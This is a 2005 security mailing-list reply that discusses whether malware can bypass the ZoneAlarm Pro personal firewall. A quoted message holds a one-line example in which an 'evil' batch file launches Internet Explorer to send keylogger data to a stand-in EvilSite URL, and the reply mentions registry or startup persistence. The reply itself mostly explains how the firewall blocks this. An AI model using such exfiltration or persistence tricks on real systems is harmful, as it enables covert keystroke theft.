Date: Mon Oct  3 19:55:30 2005
From: mail at hackingspirits.com (Debasis Mohanty)
Subject: Bypassing Personal Firewall, is it that* hard?

Bipin Gautam wrote:
>> Anyways... is Bypassing Personal Firewall & let an internal (evil)
application communicate
>> with the external world,  the hard.

Yes Indeed !! As long as you are trying out this concept with the current
versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it
even traps inter-process communications and windows messaging between two
different processes and prompts for user's permission. This goes ahead of
normal desktop based fw with more defense methods than just protecting a PC
from network based attacks.

>> Suppose; it creates a batch file run the batch file  (evil.bat) &
executes this command
>> ....Internet Explorer\> iexplore.exe
www.EvilSite.com/?cmd=submit&f=___KeyLog__

To execute the batch file, the evil-program needs to trigger the execution
of the batch file and this is easily prevented by ZA Pro.. Normally the
evil-code will use the api shell() which is prevented.

However, this will work if the users click on the batch file or run it via
Start->Run but this is not the way a evil-code works. In this scenario ZA
Pro clearly distinguishes between user interventions and a program
communicating with another program.

There is another way by which an evil-code can get this run is by moving the
batch file to system startup or pointing it in the registry to run on system
boot but this will be a warning signal for the user.

- D